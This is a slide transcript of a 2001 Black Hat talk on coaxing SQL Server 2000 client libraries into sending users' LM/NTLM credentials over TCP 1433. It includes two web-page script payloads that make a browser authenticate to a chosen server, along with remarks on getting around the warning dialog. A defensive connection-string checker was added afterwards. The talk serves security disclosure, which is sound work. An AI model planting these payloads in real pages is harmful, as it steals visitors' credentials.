
Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…
Timothy M. Mullen
AnchorIS.Com, Inc.
[email protected]
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
The Culprit:
SQL2000 Super Sockets Lib
• New functions in dbnetlib.dll!
• Supports TCP/IP sockets, encryption, authentication, etc.
• Default library on workstations that have SQL2k client utilities installed. (MSDE as well?)
Backgrounders…
• SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts).
• Integrated Authentication (NTLM creds) needed Named Pipes.
• Named Pipes required 139/445 open to the authenticating system.
Backgrounders… cont.
• Integrated Authentication has _always_ been the recommended configuration.
• 139/445 has long been blocked at the router (if not, you are a yum-yum.)
• Many server-to-server apps authenticate over TCP 1433 because it is “safe”.
The Skinny
• DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433.
• The LM/NTLM challenge/response pairs can now be sent out via 1433 (or other ports if the default is changed).
The Problem
• Many routers, though specifically blocking 139/445, still allow established traffic out, i.e. 1433 outbound is free to pass.
• Many have 1433 explicitly open for application support, server-to-server queries, etc.
The Sting
• Client-side ODBC connections can specify the target server, authentication type, and the library to use.
• Web sites can request that the client perform ADODB recordset requests, as well as other tasks.
• HTML email as well.
Somewhat Lame Example
• Web site with the following script tag:
{
// Integrated Security=SSPI plus the dbnetlib library means the NTLM exchange goes out over TCP/1433 to the Data Source host
conn = new ActiveXObject("ADODB.Connection");
conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
conn.Open();
}
Example Cont…
• User is presented with a “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.
• Easily engineered around…
Not So Lame Example
• Let’s try this one:
{
// Same trusted connection over dbnetlib.dll, but through the scriptable SQLNamespace object instead of ADODB
ns = new ActiveXObject("SQLNS.SQLNamespace");
ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
}
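A defender-side check for the two connection strings shown on the previous slides, added here for this transcript and not the speaker's code: it parses an ADO/ODBC-style connection string and flags one that would push NTLM credentials over dbnetlib to a server not on an approved list. The approved-host set, the sample strings, and treating a missing Network Library key as the SQL2k client default (dbnetlib) are assumptions.

```python
import re

# Constructed samples modelled on the two slides above, not strings captured from any site.
ADODB_SAMPLE = ("Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;"
                "Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib")
SQLNS_SAMPLE = "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll"

def parse_connection_string(cs):
    """Split 'Key=Value;Key=Value' into a dict keyed by lower-cased, trimmed names."""
    params = {}
    for part in cs.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[key.strip().lower()] = value.strip()
    return params

def requests_integrated_auth(p):
    """True when the string asks for Windows (NTLM) credentials instead of a SQL login."""
    return (p.get("integrated security", "").lower() in ("sspi", "true", "yes")
            or p.get("trusted_connection", "").lower() in ("yes", "true"))

def uses_dbnetlib(p):
    """True for the TCP-sockets library the talk describes.
    Assumption: no Network Library key means the SQL2k client default, dbnetlib."""
    lib = p.get("network library")
    if lib is None:
        return True
    return re.sub(r"\.dll$", "", lib.lower()) == "dbnetlib"

def target_host(p):
    """Host part of Data Source/Server, without any ',port' or '\\instance' suffix."""
    for key in ("data source", "server", "address", "addr", "network address"):
        if key in p:
            return re.split(r"[,\\]", p[key], maxsplit=1)[0].strip()
    return None

def assess(cs, approved_hosts):
    """Reason the string is risky, or None: risky means NTLM credentials would go
    over TCP sockets (1433 by default) to a server not on the approved list."""
    p = parse_connection_string(cs)
    if not (requests_integrated_auth(p) and uses_dbnetlib(p)):
        return None
    host = target_host(p)
    if host is None:
        return "integrated auth requested with no explicit server"
    if host in approved_hosts:
        return None
    return f"integrated auth over dbnetlib to unapproved host {host}"
```

Run `assess()` over connection strings pulled from proxied HTML or mail content with your real SQL server list as `approved_hosts`; anything it returns a reason for is a string that would make a client hand its LM/NTLM response to an outside host.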
What’s the difference?
• SQLNamespace, SQL Distribution Control, and SQL Merge Control are all scriptable, and are marked _safe for scripting_!
• Silently grab the creds for fun and profit!
Live Demo
• Don’t try this at home! Professional driver on closed course.
Thanks!
AnchorIS.Com
HammerofGod
www.anchoris.com
www.hammerofgod.com
Timothy M. Mullen
[email protected]
[email protected]